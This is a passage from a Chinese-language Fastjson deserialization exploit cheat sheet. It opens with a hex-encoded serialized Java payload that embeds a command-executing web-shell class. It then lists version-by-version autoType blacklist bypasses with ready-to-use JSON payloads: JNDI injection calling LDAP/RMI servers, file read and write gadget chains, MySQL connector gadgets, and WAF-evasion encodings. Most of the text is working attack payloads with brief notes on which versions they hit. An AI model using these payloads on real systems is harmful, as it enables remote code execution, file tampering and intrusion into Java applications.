00124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870707400136765744F757470757450726F7065727469657370737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017371007E000B3F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00084C00055F6E616D6571007E00074C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000DCFCAFEBABE0000003400CD0A0014005F090033006009003300610700620A0004005F09003300630A006400650A003300660A000400670A000400680A0033006907006A0A0014006B0A0012006C08006D0B000C006E08006F0700700A001200710700720A007300740700750700760700770800780A0079007A0A0018007B08007C0A0018007D08007E08007F0800800B001600810700820A008300840A008300850A008600870A002200880800890A0022008A0A0022008B0A008C008D0A008C008E0A0012008F0A009000910A009000920A001200930A003300940700950A00120096070097010001680100134C6A6176612F7574696C2F486173685365743B0100095369676E61747572650100274C6A6176612F7574696C2F486173685365743C4C6A6176612F6C616E672F4F626A6563743B3E3B010001720100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010001700100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100204C79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F313B01000169010015284C6A6176612F6C616E672F4F626A6563743B295A0100036F626A0100124C6A6176612F6C616E672F4F626A6563743B01000D537461636B4D61705461626C65010016284C6A6176612F6C616E672F4F626A6563743B492956010001650100154C6A6176612F6C616E672F457863657074696F6E3B010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B0100016F01000564657074680100014907007607004C070072010001460100017101000D6465636C617265644669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000573746172740100016E0100114C6A6176612F6C616E672F436C6173733B07007007009807009901000A536F7572636546696C65010010436F6D6D6F6E4563686F312E6A6176610C003C003D0C003800390C003A003B0100116A6176612F7574696C2F486173685365740C0034003507009A0C009B009C0C005300480C009D00440C009E00440C004300440100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740C009F00A00C00A100A2010003636D640C00A300A401000B676574526573706F6E736501000F6A6176612F6C616E672F436C6173730C00A500A60100106A6176612F6C616E672F4F626A6563740700A70C00A800A90100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F537472696E670100076F732E6E616D650700AA0C00AB00A40C00AC00AD01000357494E0C009D00AE0100022F630100072F62696E2F73680100022D630C00AF00B00100116A6176612F7574696C2F5363616E6E65720700B10C00B200B30C00B400B50700B60C00B700B80C003C00B90100025C410C00BA00BB0C00BC00AD0700BD0C00BE00BF0C00C0003D0C00C100C20700990C00C300C40C00C500C60C00C700C80C003A00480100135B4C6A6176612F6C616E672F4F626A6563743B0C00C900A001001E79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F3101001A5B4C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010008636F6E7461696E73010003616464010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B010010697341737369676E61626C6546726F6D010014284C6A6176612F6C616E672F436C6173733B295A010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F55707065724361736501001428294C6A6176612F6C616E672F537472696E673B01001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740100136A6176612F696F2F5072696E745772697465720100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B2956010005666C7573680100116765744465636C617265644669656C647301001C28295B4C6A6176612F6C616E672F7265666C6563742F4669656C643B01000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100076973417272617901000328295A01000D6765745375706572636C617373010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700CA0A00CB005F0021003300CB000000030008003400350001003600000002003700080038003900000008003A003B000000040001003C003D0001003E0000005C000200010000001E2AB700CC01B3000201B30003BB000459B70005B30006B8000703B80008B100000002003F0000001A0006000000140004001500080016000C001700160018001D001900400000000C00010000001E004100420000000A004300440001003E0000005A000200010000001A2AC6000DB200062AB6000999000504ACB200062AB6000A5703AC00000003003F0000001200040000001D000E001E001000210018002200400000000C00010000001A00450046000000470000000400020E01000A003A00480001003E000001D300050003000000EF1B1034A3000FB20002C6000AB20003C60004B12AB8000B9A00D7B20002C70051120C2AB6000DB6000E9900452AC0000CB30002B20002120FB900100200C7000A01B30002A7002AB20002B6000D121103BD0012B60013B2000203BD0014B60015C00016B30003A700084D01B30002B20002C60076B20003C6007006BD00184D1219B8001AB6001B121CB6001D9900102C03120F532C04121E53A7000D2C03121F532C041220532C05B20002120FB90010020053B20003B900210100BB002259B800232CB60024B60025B700261227B60028B60029B6002AB20003B900210100B6002BA700044DB12A1B0460B80008B100020047006600690017007A00E200E500170003003F0000006A001A000000250012002600130028001A0029002C002A0033002B0040002C0047002F0066003300690031006A0032006E0037007A003A007F003B008F003C0094003D009C003F00A1004000A6004200B3004400D7004500E2004700E5004600E6004800E7004B00EE004D00400000002A0004006A00040049004A0002007F0063004B004C0002000000EF004D00460000000000EF004E004F0001004700000022000B1200336107005004FC002D07005109FF003E0002070052010001070050000006000A005300480001003E000001580002000C000000842AB6000D4D2CB6002C4E2DBE360403360515051504A200652D1505323A06190604B6002D013A0719062AB6002E3A071907B6000DB6002F9A000C19071BB80030A7002F1907C00031C000313A081908BE360903360A150A1509A200161908150A323A0B190B1BB80030840A01A7FFE9A700053A08840501A7FF9A2CB60032594DC7FF85B100010027006F007200170003003F0000004200100000005000050052001E00530024005400270056002F0058003A00590043005B0063005C0069005B006F00620072006100740052007A0065007B00660083006800400000003E00060063000600540046000B0027004D004D00460007001E00560055005600060000008400570046000000000084004E004F00010005007F00580059000200470000002E0008FC000507005AFE000B07005B0101FD003107005C070052FE00110700310101F8001942070050F90001F800050001005D00000002005E707400016170770100787400017878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000000787871007E000D78;"}}

Fastjson 1.2.25-1.2.41

1.2.25后将TypeUtils.loadClass替换为checkAutoType()函数，增加了黑名单和白名单。把autoTypeSupport默认为False。当autoTypeSupport为False时，先黑名单过滤，再白名单过滤，若白名单匹配上则直接加载该类，否则报错。当autoTypeSupport为True时，先白名单过滤，匹配成功即可加载该类，否则再黑名单过滤。 1.2.25黑名单

bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework

exp 条件需要开启autotype 类名前面加了一个L，后面加一个;可以绕过黑名单

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}

Fastjson 1.2.25-1.2.42

从1.2.42版本开始,把之前的明文黑名单，改为hash黑名单。如下大佬整理的 https://github.com/LeadroyaL/fastjson-blacklist exp 条件需要开启autotype 双写绕过

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}

Fastjson 1.2.25-1.2.43

exp 条件需要开启autotype 加[{绕过

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}

Fastjson 1.2.25-1.2.45

条件需要开启autotype 45把之前问题修了，但是可以借助第三方组件绕过。需要mybatis，且版本需为3.x.x系列<3.5.0的版本。

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}

Fastjson1.2.25-1.2.47通杀

借助缓存进行通杀，缓存在1.2.48被改为默认关闭漏洞原理是通过java.lang.Class，将JdbcRowSetImpl类加载到Map中缓存，从而绕过AutoType的检测这里有两大版本范围：

1.2.25-1.2.32版本：未开启AutoTypeSupport时能成功利用，开启AutoTypeSupport不能利用

1.2.33-1.2.47版本：无论是否开启AutoTypeSupport，都能成功利用 poc:

{
  "a":{
      "@type":"java.lang.Class",
      "val":"com.sun.rowset.JdbcRowSetImpl"
  },
  "b":{
      "@type":"com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName":"ldap://localhost:1389/badNameClass",
      "autoCommit":true
  }
}

1.2.48之后版本，小弟水平有限还未复现研究，payload需要注意的细节还未探索

Fastjson1.2.5 <= 1.2.59

需要开启AutoType

{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

Fastjson1.2.5 <= 1.2.60

无需开启 autoType：

{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}

Fastjson1.2.5 <= 1.2.61

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"}

Fastjson <1.2.62

需要开启AutoType；
Fastjson <= 1.2.62；
JNDI注入利用所受的JDK版本限制；

目标服务端需要存在xbean-reflect包；

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}

fastjson<=1.2.66

前提条件

开启AutoType；
Fastjson <= 1.2.66；
JNDI注入利用所受的JDK版本限制；
org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core包；
br.com.anteros.dbcp.AnterosDBCPConfig类需要Anteros-Core和Anteros-DBCP包；

com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig类需要ibatis-sqlmap和jta包；

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

适用于jdk11以上版本的写文件的payload：

{
  "@type": "java.lang.AutoCloseable",
  "@type": "sun.rmi.server.MarshalOutputStream",
  "out": {
      "@type": "java.util.zip.InflaterOutputStream",
      "out": {
         "@type": "java.io.FileOutputStream",
         "file": "/tmp/asdasd",
         "append": true
      },
      "infl": {
         "input": {
             "array": "eJxLLE5JTCkGAAh5AnE=",
             "limit": 14
         }
      },
      "bufLen": "100"
  },
  "protocolVersion": 1
}

fastjson<=1.2.67

前提条件

开启AutoType；
Fastjson <= 1.2.67；
JNDI注入利用所受的JDK版本限制；
org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类需要ignite-core、ignite-jta和jta依赖；

org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core和slf4j-api依赖；

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}

fastjson<=1.2.68

Fastjson <= 1.2.68；

利用类必须是expectClass类的子类或实现类，并且不在黑名单中；

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.caucho.config.types.ResourceRef","lookupName": "ldap://localhost:1389/Exploit", "value": {"$ref":"$.value"}}

无需开启AutoType，直接成功绕过CheckAutoType()的检测从而触发执行：

{"@type":"java.lang.AutoCloseable","@type":"vul.VulAutoCloseable","cmd":"calc"}

读文件

{"@type":"java.lang.AutoCloseable", "@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream", "tempPath":"C:/Windows/win.ini", "targetPath":"D:/wamp64/www/win.txt"}

写文件

{
  "stream": {
      "@type": "java.lang.AutoCloseable",
      "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
      "targetPath": "D:/wamp64/www/hacked.txt",
      "tempPath": "D:/wamp64/www/test.txt"
  },
  "writer": {
      "@type": "java.lang.AutoCloseable",
      "@type": "com.esotericsoftware.kryo.io.Output",
      "buffer": "cHduZWQ=",
      "outputStream": {
          "$ref": "$.stream"
      },
      "position": 5
  },
  "close": {
      "@type": "java.lang.AutoCloseable",
      "@type": "com.sleepycat.bind.serial.SerialOutput",
      "out": {
          "$ref": "$.writer"
      }
  }
}

写文件

{
  'stream':
  {
      '@type':"java.lang.AutoCloseable",
      '@type':'java.io.FileOutputStream',
      'file':'/tmp/nonexist',
      'append':false
  },
  'writer':
  {
      '@type':"java.lang.AutoCloseable",
      '@type':'org.apache.solr.common.util.FastOutputStream',
      'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
      'sink':
      {
          '$ref':'$.stream'
      },
      'start':38
  },
  'close':
  {
      '@type':"java.lang.AutoCloseable",
      '@type':'org.iq80.snappy.SnappyOutputStream',
      'out':
      {
          '$ref':'$.writer'
      }
  }
}

适用于jdk8/10的

{
  '@type':"java.lang.AutoCloseable",
  '@type':'sun.rmi.server.MarshalOutputStream',
  'out':
  {
      '@type':'java.util.zip.InflaterOutputStream',
      'out':
      {
         '@type':'java.io.FileOutputStream',
         'file':'dst',
         'append':false
      },
      'infl':
      {
          'input':'eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=='
      },
      'bufLen':1048576
  },
  'protocolVersion':1
}

2021黑帽大会腾讯玄武披露
详细漏洞原理待研究

Mysqlconnector 5.1.x
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":”user","password":”pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":”dbname","url":""}
Mysqlconnector 6.0.2 or 6.0.3
{"@type": "java.lang.AutoCloseable","@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url": "jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}}
Mysqlconnector 6.x or < 8.0.20
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters": [{"host":"mysql.host"}], "slaves":[], "properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}

fastjson未知版本

待探索

{"@type":"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}
{"@type":"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}

bypasswaf

Fastjson默认会去除键、值外的空格、\b、\n、\r、\f等，同时还会自动将键与值进行unicode与十六进制解码。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{  "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}  {"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}

```

参考链接

Fastjson系列三——历史版本补丁绕过（需开启AutoType）
Fastjson反序列化漏洞分析
Fastjson 反序列化漏洞史
FastJson 反序列化学习

04.Fastjson各版本漏洞分析

前言

概念

演示代码

fastjson 1.2.24

fastjson 1.2.41

fastjson 1.2.42

fastjson 1.2.43

fastjson 1.2.45

fastjson 1.2.47

fastjson 1.2.62

fastjson 1.2.66

fastjson 1.2.68

fastjson黑名单

Payload转换

Fastjson姿势技巧集合

各版本利用

Fastjson 1.2.22-1.2.24

JdbcRowSetImpl

c3p0#JndiRefForwardingDataSource

bcel

1.2.33 <= fastjson <= 1.2.47

TemplatesImpl

c3p0#WrapperConnectionPoolDataSource

Fastjson 1.2.25-1.2.41

Fastjson 1.2.25-1.2.42

Fastjson 1.2.25-1.2.43

Fastjson 1.2.25-1.2.45

Fastjson1.2.25-1.2.47通杀

Fastjson1.2.5 <= 1.2.59

Fastjson1.2.5 <= 1.2.60

Fastjson1.2.5 <= 1.2.61

Fastjson <1.2.62

fastjson<=1.2.66

前提条件

fastjson<=1.2.67

前提条件

fastjson<=1.2.68

fastjson未知版本

bypasswaf

参考链接